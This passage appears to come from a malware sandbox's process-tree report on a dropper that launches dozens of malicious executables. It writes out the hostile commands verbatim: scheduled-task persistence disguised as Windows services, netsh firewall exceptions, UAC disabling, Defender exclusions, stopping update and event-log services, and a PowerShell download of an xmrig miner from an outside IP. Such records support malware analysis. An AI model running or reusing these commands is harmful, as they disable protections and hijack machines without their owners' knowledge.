C:\Users\Admin\Desktop\a\benpolatalemdar.exe"C:\Users\Admin\Desktop\a\benpolatalemdar.exe"4⤵PID:9928
-
-
C:\Users\Admin\Desktop\a\testingg.exe"C:\Users\Admin\Desktop\a\testingg.exe"4⤵PID:10140
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"5⤵PID:10060
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:11232
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"6⤵
- Modifies Windows Firewall
PID:7908
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:7900
-
-
-
-
C:\Users\Admin\Desktop\a\Server.exe"C:\Users\Admin\Desktop\a\Server.exe"4⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵PID:10700
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:4892
-
-
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"4⤵PID:9316
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:10716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ygSyNhENVfN9.bat" "5⤵PID:9580
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:6668
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4616
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"6⤵PID:7612
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:10044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STXa2K5kKGQV.bat" "7⤵PID:4928
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5768
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5756
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"8⤵PID:4620
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:10644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWJ3Q56iwfGD.bat" "9⤵PID:7100
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:7892
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4788
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"10⤵PID:7516
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:7648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyXyurQjNAbd.bat" "11⤵PID:7632
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:4896
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2748
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"12⤵PID:8824
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:10748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jkVDxXcl4I2P.bat" "13⤵PID:7220
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:7980
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8392
-
-
C:\Users\Admin\Desktop\a\seksiak.exe"C:\Users\Admin\Desktop\a\seksiak.exe"14⤵PID:392
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:3292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y0w3wKDLSfSb.bat" "15⤵PID:10508
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:7328
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6600
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\2klz.exe"C:\Users\Admin\Desktop\a\2klz.exe"4⤵PID:3532
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"5⤵PID:10448
-
-
-
C:\Users\Admin\Desktop\a\diskutil.exe"C:\Users\Admin\Desktop\a\diskutil.exe"4⤵PID:7336
-
-
C:\Users\Admin\Desktop\a\OneDrive.exe"C:\Users\Admin\Desktop\a\OneDrive.exe"4⤵PID:1096
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:10184
-
-
C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"5⤵PID:10724
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:11224
-
-
-
-
C:\Users\Admin\Desktop\a\mode11_CBNx.exe"C:\Users\Admin\Desktop\a\mode11_CBNx.exe"4⤵PID:8012
-
-
C:\Users\Admin\Desktop\a\mode11_6dMu.exe"C:\Users\Admin\Desktop\a\mode11_6dMu.exe"4⤵PID:6652
-
-
C:\Users\Admin\Desktop\a\image.exe"C:\Users\Admin\Desktop\a\image.exe"4⤵PID:10936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10936 -s 6485⤵
- Program crash
PID:8676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10936 -s 6565⤵
- Program crash
PID:7480
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3504
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:7160
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3964
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:3004
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"4⤵PID:3480
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:8776
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:8992
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:8340
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:8440
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"4⤵PID:5076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:1216
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵PID:10404
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:8944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe6⤵PID:9812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe7⤵
- Kills process with taskkill
PID:11116
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"6⤵PID:3016
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵PID:6592
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ7⤵PID:7292
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵PID:6932
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:2680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵PID:8096
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:8164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:4996 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 07⤵
- Power Settings
PID:7680
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 07⤵
- Power Settings
PID:5288
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0007⤵
- Power Settings
PID:3152
-
-
-
-
-
C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"4⤵PID:2424
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵PID:3608
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- Modifies registry key
PID:10312
-
-
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"5⤵PID:9332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 5286⤵
- Program crash
PID:9088
-
-
-
-
C:\Users\Admin\Desktop\a\Test2.exe"C:\Users\Admin\Desktop\a\Test2.exe"4⤵PID:872
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"5⤵PID:7232
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9xaax2XcK4G2.bat" "6⤵PID:10688
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:9336
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1224
-
-
-
-
-
C:\Users\Admin\Desktop\a\ytjgjdrthjdw.exe"C:\Users\Admin\Desktop\a\ytjgjdrthjdw.exe"4⤵PID:8128
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\a\ytjgjdrthjdw.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:10576
-
-
-
C:\Users\Admin\Desktop\a\kthiokadjg.exe"C:\Users\Admin\Desktop\a\kthiokadjg.exe"4⤵PID:8616
-
-
C:\Users\Admin\Desktop\a\jrockekcurje.exe"C:\Users\Admin\Desktop\a\jrockekcurje.exe"4⤵PID:2524
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\a\jrockekcurje.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:8236
-
-
-
C:\Users\Admin\Desktop\a\toolwin.exe"C:\Users\Admin\Desktop\a\toolwin.exe"4⤵PID:7560
-
-
C:\Users\Admin\Desktop\a\systempreter.exe"C:\Users\Admin\Desktop\a\systempreter.exe"4⤵PID:1216
-
C:\Users\Admin\Desktop\a\._cache_systempreter.exe"C:\Users\Admin\Desktop\a\._cache_systempreter.exe"5⤵PID:5988
-
-
-
C:\Users\Admin\Desktop\a\Sync.exe"C:\Users\Admin\Desktop\a\Sync.exe"4⤵PID:2012
-
-
C:\Users\Admin\Desktop\a\image%20logger.exe"C:\Users\Admin\Desktop\a\image%20logger.exe"4⤵PID:10072
-
-
C:\Users\Admin\Desktop\a\mode11_UVo6.exe"C:\Users\Admin\Desktop\a\mode11_UVo6.exe"4⤵PID:5972
-
-
C:\Users\Admin\Desktop\a\mode11_N1Fz.exe"C:\Users\Admin\Desktop\a\mode11_N1Fz.exe"4⤵PID:7552
-
-
C:\Users\Admin\Desktop\a\Google%20Chrome.exe"C:\Users\Admin\Desktop\a\Google%20Chrome.exe"4⤵PID:4372
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B275.tmp\B276.tmp\B277.bat C:\Users\Admin\Desktop\a\Google%20Chrome.exe"5⤵PID:8676
-
-
-
C:\Users\Admin\Desktop\a\Bootxr.exe"C:\Users\Admin\Desktop\a\Bootxr.exe"4⤵PID:9480
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe5⤵PID:7724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe6⤵
- Command and Scripting Interpreter: PowerShell
PID:9992
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:2844
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5744
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"4⤵PID:9260
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6540
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2124
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"4⤵PID:9068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a5⤵PID:8932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 9365⤵PID:10008
-
C:\Windows\system32\chcp.comchcp 9366⤵PID:10140
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6396
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:3404
-
C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"4⤵PID:8916
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:2708
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:1324
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6236
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5724
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6280
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:1764
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"4⤵PID:1412
-
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"4⤵PID:5616
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"4⤵PID:7076
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"4⤵PID:7700
-
-
C:\Users\Admin\Desktop\a\TEST.exe"C:\Users\Admin\Desktop\a\TEST.exe"4⤵PID:8180
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"4⤵PID:5812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7624
-
-
C:\Windows\SYSTEM32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:10076
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:9408
-
-
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"4⤵PID:4928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 3405⤵
- Program crash
PID:8836
-
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"4⤵PID:8296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8296 -s 3405⤵
- Program crash
PID:8888
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"4⤵PID:7584
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3732
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2460
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:5204
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2708
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3500
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6200
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"4⤵PID:5800
-
C:\xmrig\xmrig-6.22.2\xmrig.exe"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json5⤵PID:1796
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"4⤵PID:6980
-
-
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"4⤵PID:7380
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"4⤵PID:7468
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"4⤵PID:8000
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5420
-
-
C:\Windows\system32\a7\RuntimeBroker.exe"C:\Windows\system32\a7\RuntimeBroker.exe"5⤵PID:7768
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:7740
-
-
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"4⤵PID:5712
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:8692
-
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"4⤵PID:8936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8936 -s 3405⤵
- Program crash
PID:3372
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:4344
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:4336
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:9204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 4765⤵
- Program crash
PID:8708
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:1392
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6172
-
C:\Users\Admin\Desktop\a\32.exe"C:\Users\Admin\Desktop\a\32.exe"4⤵PID:9932
-
C:\Users\Admin\Desktop\a\._cache_32.exe"C:\Users\Admin\Desktop\a\._cache_32.exe"5⤵PID:7740
-
C:\Users\Admin\Desktop\a\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\a\voidware_loader.exe"6⤵PID:9288
-
-
C:\Users\Admin\Desktop\a\a\build.exe"C:\Users\Admin\Desktop\a\a\build.exe"6⤵PID:7624
-
-
C:\Users\Admin\Desktop\a\a\gem2.exe"C:\Users\Admin\Desktop\a\a\gem2.exe"6⤵PID:5172
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
PID:7724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:9880
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:1096
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:9824
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:10464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:11096
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:10956
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:10696
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:10020
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:6652
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:224
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:10208
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:10544
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:9988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"7⤵
- Launches sc.exe
PID:9340
-
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"6⤵PID:9548
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:5484
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:10196
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:7568
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:5820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9548 -s 8167⤵
- Program crash
PID:9988
-
-
-
-
-
C:\Users\Admin\Desktop\a\BootstrapperNew.exe"C:\Users\Admin\Desktop\a\BootstrapperNew.exe"4⤵PID:8340
-
-
C:\Users\Admin\Desktop\a\prueba.exe"C:\Users\Admin\Desktop\a\prueba.exe"4⤵PID:9756
-
-
C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"4⤵PID:9088
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵PID:768
-
